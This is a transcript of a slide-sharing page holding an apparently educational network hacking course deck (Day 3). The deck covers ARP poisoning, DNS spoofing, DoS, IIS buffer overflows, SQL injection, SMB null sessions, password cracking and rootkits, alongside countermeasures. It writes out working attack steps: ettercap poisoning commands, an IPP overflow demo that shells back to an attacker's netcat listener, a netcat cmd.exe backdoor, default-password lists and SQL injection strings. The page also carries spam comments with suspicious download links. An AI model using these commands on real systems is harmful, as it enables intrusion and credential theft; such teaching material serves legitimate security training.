Day3 Backup

3,680 views

Published on

Network Security and Hacking Techniques

Published in: Technology, Self Improvement
  • free free download this latest version 100% working.
    download link- http://gg.gg/hqcf
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • You Can Free Download Latest & Working -> http://www.sendspace.com/file/ccgilz
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here

Day3 Backup

  1. 1. Network Security and Hacking Techniques Day-3
  2. 2. Typical Network- Hacking Techniques “The Linux Based PC Servers Services that Mean Business Visible Securing Internet” IP Address I Want these systems Internal Network Linux and windows Host Application Servers Like IDS,Sniffers Network Security and Hacking Techniques – DAY-3
  3. 3. Network-Level Attacks  ARP Refresher  Sniffing Attacks  Sniffing Detection  Ettercap Example  DNS Cache Poisoning  Denial of Service Attacks Network Security and Hacking Techniques – DAY-3
  4. 4. ARP Refresher  ARP Message Formats  ARP packets provide mapping between hardware layer and protocol layer addresses  28 byte header for IPv4 ethernet network  8 bytes of ARP data  20 bytes of ethernet/IP address data  6 ARP messages  ARP request and reply  ARP reverse request and reply  ARP inverse request and reply Network Security and Hacking Techniques – DAY-3
  5. 5. Gathering and Parsing Packets (Cont..)  IP Address Spoofing Variations Network Security and Hacking Techniques – DAY-3
  6. 6. ARP Request Message  Source contains initiating system’s MAC address and IP address  Destination contains broadcast MAC address ff.ff.ff.ff.ff.ff Network Security and Hacking Techniques – DAY-3
  7. 7. ARP Reply Message  Source contains replying system’s MAC address and IP address  Destination contains requestor’s MAC address and IP address Network Security and Hacking Techniques – DAY-3
  8. 8. Unsolicited ARP Reply  Any system can spoof a reply to an ARP request  Receiving system will cache the reply  Overwrites existing entry  Adds entry if one does not exist  Usually called ARP poisoning Network Security and Hacking Techniques – DAY-3
  9. 9. Types of Attack  Sniffing Attacks  Session Hijacking/MiM Network Security and Hacking Techniques – DAY-3
  10. 10. Sniffing on a Hub Sniffer Source Destination CIS COS YS TEMS Hub Network Security and Hacking Techniques – DAY-3
  11. 11. Host to Host Exploit Client (C) Server (S) Hostile Real ARP Reply Spoofed ARP Reply C Spoofed ARP Reply S Broadcast ARP Request Network Security and Hacking Techniques – DAY-3
  12. 12. Host to Router Exploit Client (C) Gateway Router (R) Hostile S CT SM CS IY OS E Real ARP Reply Spoofed ARP Reply C Spoofed ARP Reply R Broadcast ARP Request Network Security and Hacking Techniques – DAY-3
  13. 13. Relay Configuration Attacker 0:c:3b:1a:7c:ef- 10.1.1.10 M-1 M-3 0:c:3b:1c:2f:1b- 10.1.1.2 0:c:3b:9:4d:8- 10.1.1.7 0:c:3b:1a:7c:ef- 10.1.1.7 0:c:3b:1a:7c:ef- 10.1.1.2 Network Security and Hacking Techniques – DAY-3
  14. 14. Relay Configuration (cont.) Sniffer Source Destination CI COSYST S EMS Switch Network Security and Hacking Techniques – DAY-3
  15. 15. Detection  OS Level Detection Operating OS Level Detection System Detection Windows 95 NO Windows 98 NO Windows NT NO Windows 2000 NO Linux RedHat 7.0 NO FreeBSD 4.2 YES Network Security and Hacking Techniques – DAY-3
  16. 16. Hypothetical Detection Application  Purpose  Track and maintain ARP/IP pairings  Identify non-standard ARP-replies versus acceptable ones • Timeout issues  OS must withstand corruption itself  Fix broken ARP entries of systems • Transmission of correct ARP replies Network Security and Hacking Techniques – DAY-3
  17. 17. Tools and Utilities  Manipulation  Dsniff 2.3  Hunt 1.5  Growing number of others  Local monitoring  Arpwatch 1.11 Network Security and Hacking Techniques – DAY-3
  18. 18. Tools - ARP Spoofing  Windows  Ettercap  Unix  Dsniff  Hunt Network Security and Hacking Techniques – DAY-3
  19. 19. Ettercap  To start  C:ettercap –i dev1 • Try dev0, dev1, dev2, etc., until it finds your Ethernet adapter • It takes a long time to scan the network Network Security and Hacking Techniques – DAY-3
  20. 20. Ettercap Sniffing Options Usage: ettercap [OPTION] [HOST:PORT] [HOST:PORT] [MAC] [MAC] Sniffing method: -a, --arpsniff ARPBASED sniffing (specifying two hosts) SMARTARP (specifying one host but with the list PUBLICARP (specifying only one host silently) in silent mode : must specify both IP and MAC i.e.: ettercap -Nza IP IP MAC MAC (ARPBASE ettercap -Na IP MAC (SMARTARP ettercap -Nza IP MAC (PUBLICAR -s, --sniff IPBASED sniffing you can specify the ANY ip that means ALL hosts e.g.: ettercap -Nzs ANY:80 (sniff only http) -m, --macsniff MACBASED sniffing e.g.: ettercap -zm MAC1 MAC2 ettercap -Nm MAC Off Line Sniffing: -T, --readpcapfile OFFLINE sniffing (read packets from a file) e.g.: ettercap -T file_dumped_from_tcpdump -Y, --writepcapfile DUMP packets to a pcap compatible file format e.g.: ettercap -NzsY file_to_be_dumped Network Security and Hacking Techniques – DAY-3
  21. 21. Spoofing example with Ettercap  HOST 1 telling that 10.1.1.7 is on 0:c:3b:1a:7c:ef  HOST 2 telling that 10.1.1.2 is on 0:c:3b:1a:7c:ef (C:ettercap –a 10.1.1.2 10.1.1.7 0:c:3b:1c:2f:1b 0:c:3b:9:4d:8) now they are poisoned !! they will send their packets to us ! Then if we receive packets from:  HOST 1 we will forward to 0:c:3b:9:4d:8  HOST 2 we will forward to 0:c:3b:1c:2f:1b Attacker 0:c:3b:1a:7c:ef- 10.1.1.10 M-1 M-3 0:c:3b:1c:2f:1b- 10.1.1.2 0:c:3b:9:4d:8- 10.1.1.7 0:c:3b:1a:7c:ef - 10.1.1.7 0:c:3b:1a:7c:ef - 10.1.1.2 Network Security and Hacking Techniques – DAY-3
  22. 22. Bibliography  Finlayson, Mann, Mogul, Theimer, RFC 903 “A Reverse Address Resolution Protocol,” June 1984  Kra, Hunt 1.5, http://www.gncz.cz/kra/index.html, Copyright 2000  Lawrence Berkeley National Laboratory, Network Research Group, Arpwatch 1.11, ftp://ftp.ee.lbl.gov/ arpwatch.tar.Z, Copyright 1996  Plummer, David C., RFC 826 “An Ethernet Address Resolution Protocol,” November 1982  Russel, Ryan and Cunningham, Stace, “Hack Proofing Your Network,”, Syngress Publishing Inc, Copyright 2000  Song, Dug, Dsniff 2.3, http://www.monkey.org/~ dugsong/, Copyright 2000 Network Security and Hacking Techniques – DAY-3
  23. 23. Network-Level Attacks(Cont…)  Packet Sniffing: Packet sniffer is a piece of software that grabs all of the traffic flowing  Dsniff –n –i 1 Network Security and Hacking Techniques – DAY-3
  24. 24. DNS Cache Poisoning  DNS Cache Poisoning  DNS ID Spoofing  DNS Hides Poisoning Network Security and Hacking Techniques – DAY-3
  25. 25. DNS Cache Poisoning - TOOL  http://www.securiteinfo.com/download/wds.zip  This tool is a simple DNS ID Spoofer for Windows 9x/2K  the MAC address of the DNS server (or the default gateway if the DNS server is in another network).  Usage : wds -h  Example : wds -n www.microsoft.com -i 216.239.39.101 -g 00-00-39-5c-45-3b Network Security and Hacking Techniques – DAY-3
  26. 26. Gathering and Parsing Packets (Cont..)  The ARP Cache poisoning: Network Security and Hacking Techniques – DAY-3
  27. 27. Denial of Service Attacks Network Security and Hacking Techniques – DAY-3
  28. 28. Denial of Service Attacks  DoS attacks are as old as the Internet itself  Year 2000 when a complete new quality of DoS attack started (DDoS).  (DDoS) stroke a huge number of prominent web sites including Yahoo, Ebay, Amazon and Buy.com  DDoS Concepts: Distributing the attack across several hosts. Coordinating the attack among many machines. Using the distribution system to thwart all attempts of discovering the origin of the attack. Network Security and Hacking Techniques – DAY-3
  29. 29. Denial of Service Attacks  TCP Connections Network Security and Hacking Techniques – DAY-3
  30. 30. Denial of Service Attacks (Cont…) Abusing TCP: The Traditional SYN Flood Network Security and Hacking Techniques – DAY-3
  31. 31. “Smurf” IC M P e c h o ( s p o o f e d s o u r c e a d d r e s s o f v ic t im ) S e n t to IP b ro a d c a s t a d d re s s I C M P e c h o r e p ly In te rn e t P e rp e tra to r V ic t im Network Security and Hacking Techniques – DAY-3
  32. 32. Denial of Service Attacks (Cont…) The Development of Bandwidth Attacks Network Security and Hacking Techniques – DAY-3
  33. 33. Denial of Service Attacks (Cont…) DOS Network Security and Hacking Techniques – DAY-3
  34. 34. Denial of Service Attacks (Cont…) DDOS Network Security and Hacking Techniques – DAY-3
  35. 35. Denial of Service Attacks (Cont…) Distributed Reflection DOS Network Security and Hacking Techniques – DAY-3
  36. 36. Denial of Service Attacks (Cont…) Packet path diffusion Network Security and Hacking Techniques – DAY-3
  37. 37. Denial of Service Attacks (Cont…) Diffusing the path Network Security and Hacking Techniques – DAY-3
  38. 38. Prevention Techniques  In g r e s s F ilt e r in g Deployed by ISP's to drop packets with IP addresses outside the range of a customer’s network, so that they can prevent attackers from using forged source addresses to launch a DoS attack.  E g r e s s F ilt e r in g Prevents one’s network from being the source of forged communications used in DoS attacks. Network Security and Hacking Techniques – DAY-3
  39. 39. Web Application Attacks  Introduction  Hacking Windows 2000: A Sample  SQL Injection: Manipulating Back-end Databases  Cross-Site Scripting Network Security and Hacking Techniques – DAY-3
  40. 40. The Hacking Exposed Philosophy “The most important step towards securing your network Is trying to break into it.” Network Security and Hacking Techniques – DAY-3
  41. 41. Background  Most “script kiddies” will attack the OS and web server service.  They scan for web ports, search for vulnerabilities, and then attack.  The more sophisticated attacker will attack the custom application running on the web server. Network Security and Hacking Techniques – DAY-3
  42. 42. Hacking Step 1: Scanning… Step1: Using NMAP or Any port Scanner, he will find the ports are opened on those network and what application is running on those ports Network Security and Hacking Techniques – DAY-3
  43. 43. Hacking Step 2: Vulnerability Scanning…  Web vulnerability scanners check for known holes.  Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items #nikto.pl -h 206.135.57.178 -- nikto / v1.4.0 / rain forest puppy / www.wiretrip.net -- - Loaded script database of 1968 lines =-=-=-=-=-= = Host: 206.135.57.178 = Server: Apache/1.3.20 (Unix) - www.apache.org + 404 Not Found: GET /cfdocs/ - Directory index: /scripts/ + Found: GET /scripts/cfcache.map + 404 Not Found: GET /cfcache.map + 404 Not Found: GET /cfide/Administrator/startstop.html Network Security and Hacking Techniques – DAY-3
  44. 44. Hacking Step 2: Vulnerability Identification Search Internet for current vulnerabilities  http://www.google.com  http://www.securityfocus.com  http://www.packetstormsecurity.com/ Network Security and Hacking Techniques – DAY-3
  45. 45. Vulnerability Identification  www.SecurityFocus.com  Vulnerabilities by vendor  Vulnerabilities by BID www.securityfocus.com/bid/<bid #> Network Security and Hacking Techniques – DAY-3
  46. 46. Vulnerability Identification  www.packetstormsecurity.com  Useful directory of site  http://packetstormsecurity.com/windows2000/ Network Security and Hacking Techniques – DAY-3
  47. 47. Hacking Windows 2000  More recently, the most effective way to compromise a Windows NT/2000 system is via Internet Information Server (IIS)  IIS is installed by default, listens on TCP 80; many don’t realize it’s there (and vulnerable…)  Those who run their Website on IIS can’t just block access to it  Windows 2000 ships with IIS version 5 (IIS5)  Microsoft’s flagship Webserver has a long history of security flaws  It is debatable whether these flaws are more prevalent in Microsoft code, or whether Microsoft’s code is simply more prevalent (Yes, we’ll talk about Gartner later…) Network Security and Hacking Techniques – DAY-3
  48. 48. Top Five Windows 2000 IIS Threats  Remote Command Execution Via Internet Printing Service  Microsoft IIS CGI Filename Decode Error Vulnerability  Remote command execution via Buffer Overflow in Indexing Service  Unauthorised SMTP relaying  Buffer Overflow i n FrontPage server extension Network Security and Hacking Techniques – DAY-3
  49. 49. Remote Command Execution Via Internet Printing Service  Internet Printing is a new feature in Windows, introduced with the release of Windows 2000 Server.  It provides users with the ability to access a printer across an Intranet or the Internet and submit a job directly to the printer through the browser.  This functionality is enabled by default  The vulnerability exists in an unchecked buffer in the msw3prt.dll, allowing an attacker to post a string of approximately 420 characters that will cause the buffer to overflow and commands to be overwritten with the newly injected shell code. Network Security and Hacking Techniques – DAY-3
  50. 50. IIS Buffer Overflows: IPP Simple to exploit: GET /null.printer HTTP/1.0 Host: [> 420 char. buffer] Network Security and Hacking Techniques – DAY-3
  51. 51. IIS Buffer Overflows: IPP  Published exploits: jill-win32.exe by dark spyrit Iis5hack.exe by hsj  Remotely exploits buff. overflow, inserts shellcode to “shell” back to a listener on attacker’s system  Evil… Network Security and Hacking Techniques – DAY-3
  52. 52. IIS Buffer Overflows: IPP Network Security and Hacking Techniques – DAY-3
  53. 53. IPP Buffer Overflow DEMO IPP Buffer Overflow DEMO  Start netcat listener on attacker’s system nc –vv –l –p 23  Execute jill-win32: jill-win32 victim 80 attacker 23  Shell pops up on attacker’s machine, SYSTEM context Network Security and Hacking Techniques – DAY-3
  54. 54. Practicals Try to compromise your server Network Security and Hacking Techniques – DAY-3
  55. 55. SQL Scanning  TCP port 1433  SQL Server defaults to listen on these ports since ip-sockets net-lib is installed by default (along with named pipes)  UDP port 1434  Thanks to multiple instancing, having to know the exact port is not needed to connect since the net-libs will be more than happy to auto- connect you to the instance Network Security and Hacking Techniques – DAY-3
  56. 56. SQL Scanning (cont.) Starting nmapNT V. 2.53 SP1 by ryan@eEye.com eEye Digital Security ( http://www.eEye.com ) based on nmap by fyodor@insecure.org ( www.insecure.org/nmap/ ) Interesting ports on (10.6.6.205): (The 1507 ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 25/tcp open smtp 80/tcp open http 88/tcp open kerberos-sec 135/tcp open loc-srv 139/tcp open netbios-ssn 389/tcp open ldap 443/tcp open https 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 1026/tcp open nterm 1080/tcp open socks 1433/tcp open ms-sql-s ------- 3389/tcp open msrdp Network Security and Hacking Techniques – DAY-3
  57. 57. SQL Server Discovery  Multiple instancing capabilities of SQL Server 2000 make enumeration a functional requirement  A specially formed UDP packet directed at port 1434 will cause the SQL 2K listener service to divulge information about every instance of SQL Server running on that machine  Packet Information • Instance names • Net-libs supported • TCP ports and pipe names • Clustering support (juicy targets) Network Security and Hacking Techniques – DAY-3
  58. 58. Broadcast Discovery  Since the listener may exist on multiple machines, it is possible to send a broadcast UDP packet to port 1434 to discover all instances of SQL Server 2000 on a subnet  sql –L (will return a raw listing)  Capture returned packets  Analyze Network Security and Hacking Techniques – DAY-3
  59. 59. SQL Server Discovery The following is a sample response from a SQL Server to the UDP broadcast: (Captured using Snort-1.6.3 – http://www.snort.org) =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= +=+=+=+=+=+=+=+=+ [**] SQL Server Reply [**] 12/22-14:18:22.320099 10.6.7.37:1434 -> 10.6.6.194:4412 UDP TTL:128 TOS:0x0 ID:15054 Len: 133 .z.ServerName;DEV-REPORT2;InstanceName;MSSQLSERVER;IsClustered;N o;Version;8.00.194;tcp;1433;np;DEV-REPORT2pipesqlquery;; =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+= +=+=+=+=+=+=+=+=+ Network Security and Hacking Techniques – DAY-3
  60. 60. SQLPing Utility http://www.sqlsecurity.com/utils/sqlping.zip  Directs a custom udp packet at a specific target or subnet and enumerates the server info across multiple instances Listening.... ServerName:LANDROVER InstanceName:SQL2K IsClustered:No Version:8.00.194 tcp:1241 np:LANDROVERpipeMSSQL$SQL2Ksqlquery ServerName:LANDROVER InstanceName:MSSQLServer IsClustered:No Version:7.00.623 np:LANDROVERpipesqlquery tcp:1433 rpc:LANDROVER Network Security and Hacking Techniques – DAY-3
  61. 61. SQL Code Injection  Ability of an attacker to inject unintended SQL statements into application  Consequences • Exposure of sensitive data • SQL privilege escalation • OS access • COM+ access Network Security and Hacking Techniques – DAY-3
  62. 62. Scope of SQL Injection  SQL injection attacks rarely alerts IDS systems especially over SSL  Difficult to track down all the areas of exploitation since the only real solution is manual code review  No amount OS security, firewalls, patch diligence will stop SQL injection.  The solution is good coding practices Network Security and Hacking Techniques – DAY-3
  63. 63. SQL Injection Sample  ASP Code <% Set Conn = Server.CreateObject("ADODB.Connection") Conn.open “dsn=myapp;uid=sa;pwd=45nf3k332fhj“ Set RS = Conn.Execute("SELECT * from users where username=‘" & username & “’ AND password=‘“ & password & "’" ) %> Network Security and Hacking Techniques – DAY-3
  64. 64. SQL Injection Example 1  Normal login Login Page UserName: bob Password: b2oQeDr!  SQL Server sees • select * from users where username=‘bob’ and password=‘b2oQeDr!’ • All is well (or so it seems) Network Security and Hacking Techniques – DAY-3
  65. 65. SQL Injection Example 1  Malicious Login Login Page UserName: bob Password: ‘ union select * from users where admin=1—  SQL Server sees • select * from users where username=‘bob’ and password=‘’ union select * from users where admin=1 • In this case the user logs in as the site administrator Network Security and Hacking Techniques – DAY-3
  66. 66. SQL Injection Example 2  Normal usage User Search Enter Last Name : andrews Results: Last First email Andrews, chip chip@sqlsecurity.com  Notice that on a search page we get immediate feedback – good target for injection  Also, since we see three columns we can assume that’s all the SQL statement is selecting Network Security and Hacking Techniques – DAY-3
  67. 67. SQL Injection Example 2  Malicious Usage User Search Enter Last Name : ‘ union select ’’,’’,@@version Results: Last First email Microsoft SQL Server 2000 - 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 1) Network Security and Hacking Techniques – DAY-3
  68. 68. SQL Injection Samples  Problems  Poor input validation  Secret in ASP code (source code disclosure)  Poorly typed – SQL server and ASP not checking data-types  Security context too high for needed functionality Network Security and Hacking Techniques – DAY-3
  69. 69. Best Practices  Use principle of least-privilege  Assign MSSQLServer service non-administrator user context  Take the time to properly implement trusted security (Integrated Mode)  Don’t place passwords in script  Assign complex ‘sa’ password even when using Integrated security  Consider dropping certain procedures in the interest of security. They can always be added later. Network Security and Hacking Techniques – DAY-3
  70. 70. Operating System and Application-Level Attacks  Password Cracking With L0phtCrack  NetBios/SMB Hacking  Buffer Overflows in Depth  Examples of remote root exploit through buffer overflow  Root Kits Network Security and Hacking Techniques – DAY-3
  71. 71. NetBios/SMB Hacking  Introduction  SMB/NetBios Explained and Exploited  Win2k Architecture  Network and Host Enumeration  Penetration  Pillaging Hosts  Escalation  Summary and Wrap-up Network Security and Hacking Techniques – DAY-3
  72. 72. SMB/NetBios Explained and Exploited  SMB is Server Message Blocks  A protocol over NetBios or TCP  Used for “net use” type communications • UDP port 137 (name services) • UDP port 138 (datagram services) • TCP port 139 (session services)  NT uses port 139  Win2k uses ports 139 and/or 445 Network Security and Hacking Techniques – DAY-3
  73. 73. SMB/NetBios Explained and Exploited  Mapping a drive syntax will prompt for password  Null Session is no user with no password  Access to TCP 139, 445, IPX, or NetBEUI  Null session not meaningfully logged  Normal part of other network operations  Hackers can use to enumerate network net use * targetshare */user:domainusername net use targetshare “” /user:”” Network Security and Hacking Techniques – DAY-3
  74. 74. Host Enumeration  Just to reiterate… We are connecting with a BLANK username and a BLANK password  This functionality is enabled by default on NT/2000 (port 445 also)  This is one of the most debilitating vulnerabilities faced by NT/2000 deployments of all sizes!!!!  This connection is not logged in the Event Log, nor is it recorded by a majority of the Host Based IDS products Network Security and Hacking Techniques – DAY-3
  75. 75. Penetration  The primary goal is to authenticate ourselves to the remote host. We can do this by:  Guessing username / password combinations,  Obtaining the user hashes, or  Exploiting a vulnerable service Network Security and Hacking Techniques – DAY-3
  76. 76. Password Guessing  Guessing Username/Password combinations:  Review results from DumpSec output  Identify those that: • haven’t changed their passwords recently • haven’t logged on recently • are members of the admin group • may be a shared group account • are lab or test accounts • have juicy info in the comment field Network Security and Hacking Techniques – DAY-3
  77. 77. Guessing Passwords  NT/2000 does not support logging on with multiple credentials simultaneously, so:  Log off as null session user:  net use * /del  Attempt to logon as target user: net use targetipc$ * /user:targetusername Network Security and Hacking Techniques – DAY-3
  78. 78. Password Guessing  High Probability Combinations:  administrator blank, password, administrator  arcserve arcserve, backup  test test, password  lab lab, password  username username, company_name  backup backup  tivoli tivoli  symbiator symbiator, as400  backupexec backup Network Security and Hacking Techniques – DAY-3
  79. 79. enum Brute Force Features usage: enum [switches] [hostname|ip] -U: get userlist -M: get machine list -N: get namelist dump (different from -U|-M) -S: get sharelist -P: get password policy information -G: get group and member list -L: get LSA policy information -D: dictionary crack, needs -u and -f -d: be detailed, applies to -U and -S -c: don't cancel sessions -u: specify username to use (default "") -p: specify password to use (default "") -f: specify dictfile to use (wants -D) Network Security and Hacking Techniques – DAY-3
  80. 80. enum Brute Force Features Network Security and Hacking Techniques – DAY-3
  81. 81. Password Guessing Countermeasures  Enable lockout for all accounts  Use passprop to enable Admin lockout (remote only, not TS)  Enforce password policy (passfilt, KB Q161990, W2K Account Policy)  Audit logon/logoff failures  Treat the Administrator and Domain Admins accounts as holders of the keys to the kingdom – they are! Network Security and Hacking Techniques – DAY-3
  82. 82. Sniffing Password Data  NT/2000 uses a challenge/response authentication mechanism  Neither passwords nor their hashes are sent across the wire  However, The L0pht discovered a way to extract hashes from the logon exchange  SMB Packet Capture  L0pht Crack (2.52) works on an NT4 machine but does not work on Win 2000  Version 3 incorporates a new packet driver that works?[not yet] on Win 2000  ScoopLM from SecurityFriday does work on Win2k Network Security and Hacking Techniques – DAY-3
  83. 83. Sniffing Passwords..L0pht Network Security and Hacking Techniques – DAY-3
  84. 84. Sniffing Passwords..ScoopLM Network Security and Hacking Techniques – DAY-3
  85. 85. Cracking Passwords  Once you’ve obtained password hashes, there’s no good reason not to start cracking them immediately  Several tools have been written to optimize this process The best are:  L0phtcrack  John the Ripper  BeatLM for use with ScoopLM Network Security and Hacking Techniques – DAY-3
  86. 86. Cracking Passwords L0phtcrack Network Security and Hacking Techniques – DAY-3
  87. 87. Cracking Passwords John the Ripper Version 1.6 Copyright (c) 1996-98 by Solar Designer Usage: john [OPTIONS] [PASSWORD-FILES] -single "single crack" mode -wordfile:FILE –stdin wordlist mode, read words from FILE or stdin -rules enable rules for wordlist mode -incremental[:MODE] incremental mode [using section MODE] -external:MODE external mode or word filter -stdout[:LENGTH] no cracking, just write words to stdout -restore[:FILE] restore an interrupted session [from FILE] -session:FILE set session file name to FILE -status[:FILE] print status of a session [from FILE] -makechars:FILE make a charset, FILE will be overwritten -show show cracked passwords -test perform a benchmark -users:[-]LOGIN|UID[,..] load this (these) user(s) only -groups:[-]GID[,..] load users of this (these) group(s) only -shells:[-]SHELL[,..] load users with this (these) shell(s) only -salts:[-]COUNT load salts with at least COUNT passwords only -format:NAME force ciphertext format NAME (DES/BSDI/MD5/BF/AFS/LM) -savemem:LEVEL enable memory saving, at LEVEL 1..3 Network Security and Hacking Techniques – DAY-3
  88. 88. Cracking Passwords Countermeasure  Enforce password length of exactly 7 characters  All passwords should meet complexity minimums, such as different case, numerals, and punctuation Network Security and Hacking Techniques – DAY-3
  89. 89. Get Interactive Overview  If we are truly to become the machine there are certain things we must do  Firstly, copy up our Admin Kit  Second, is to gain an interactive shell  Last is to prepare target machine in order to launch further attacks Network Security and Hacking Techniques – DAY-3
  90. 90. Get Interactive Map to a drive on the target host and copy over the followin files:  fscan  Netcat  Local  Global  Pwdump2,3  Remote  Lsadump2  Cp  DumpSec  Getmac  Netdom  Nltest Network Security and Hacking Techniques – DAY-3
  91. 91. Get Interactive : REMOTE.EXE  Launch remote.exe on the target host  Syntax:  remote /s “cmd.exe” [secret]  Connect to remote pipe  Syntax  remote /c hostname [secret] Network Security and Hacking Techniques – DAY-3
  92. 92. Get Interactive : NC.EXE  Netcat syntax on remote host:  nc –l –d –p 2002 –e “cmd.exe”  Netcat syntax to connect to listener  nc –n –v target_ip 2002 This is the preferable method, but it only works over IP. Great when 139 is blocked. Network Security and Hacking Techniques – DAY-3
  93. 93. Operating System and Application-Level Attacks Buffer Overflows in Depth Buffer Overflow Exploit In general, buffer overflow attack involves the following steps: i. stuffing more data into a buffer than it can handle ii. overwrites the return address of a function iii.switches the execution flow to the hacker code Network Security and Hacking Techniques – DAY-3
  94. 94. Operating System and Application-Level Attacks Process Memory Region Network Security and Hacking Techniques – DAY-3
  95. 95. RootKit Root Kits  Rootkit name are combination from two words, root and kit  Collection of tools that enable attacker to keep the root power Type of Rootkit  Application rootkit - established at the application layer.  Kernel rootkit - establish more deep into kernel layer. Network Security and Hacking Techniques – DAY-3
  96. 96. RootKit (Cont…) Application Rootkit  Programs replace to hide attacker presence. Examples ls,ps,top,du,find,ifconfig,lsof  Network Daemons with backdoor  Sniffer Program Kernel Rootkit  Hiding processes.  Hiding files  Hiding the sniffer.  Hiding the File System Network Security and Hacking Techniques – DAY-3
  97. 97. NT Rootkit Process hiding Network Security and Hacking Techniques – DAY-3
  98. 98. NT Rootkit File hiding Network Security and Hacking Techniques – DAY-3
  99. 99. NT Rootkit  Rootkit console with Keyboard sniffing Network Security and Hacking Techniques – DAY-3
  100. 100. Detecting hidden processes Two Software Network Security and Hacking Techniques – DAY-3
  101. 101. Anonymity on the web  Anonymity and the Internet  Anonymizing proxy  Case Studies – Anonymity WebSite  Case Studies – Anonymity Softwares  Questions Network Security and Hacking Techniques – DAY-3
  102. 102. Anonymity and the Internet Anonymity: the state of being unknown or unfamiliar Sometimes it is important for one’s identity to remain anonymous Why might individuals want their identity to remain anonymous? People generally do not like to be tracked without their knowledge. The average web surfer and Internet hacker wishes to remain anonymous. Network Security and Hacking Techniques – DAY-3
  103. 103. Anonymity and the Internet  There are many ways user information can be discovered.  An individual’s location or identity can be determined using “cookies” and/or an IP address  Cookie: a small piece of information that a server stores on the user’s computer. Example: a yellow pages site  IP address: a series of four numbers which uniquely identify your computer on the Internet. Example: 129.186.1.201  ISP’s keep track of the IP addresses their customers use, and may also keep records of names and pseudonyms Network Security and Hacking Techniques – DAY-3
  104. 104. Anonymizing proxy  Acts as a proxy for users  Hides information from end servers Request Request End Browser Proxy Server Reply Reply  Sees all web traffic  Free and subscription services available  Some free services add advertisements to web pages Network Security and Hacking Techniques – DAY-3
  105. 105. Case Studies – Anonymity WebSite Anonymizer.com Proxify.com Network Security and Hacking Techniques – DAY-3
  106. 106. Case Studies – Anonymity Software JAP It is integrated with Browser Network Security and Hacking Techniques – DAY-3
  107. 107. Case Studies – Anonymity Software Hopster Bypass Firewall, Bypass Proxy Network Security and Hacking Techniques – DAY-3
  108. 108. Anonymity on the web Questions ?? Network Security and Hacking Techniques – DAY-3

×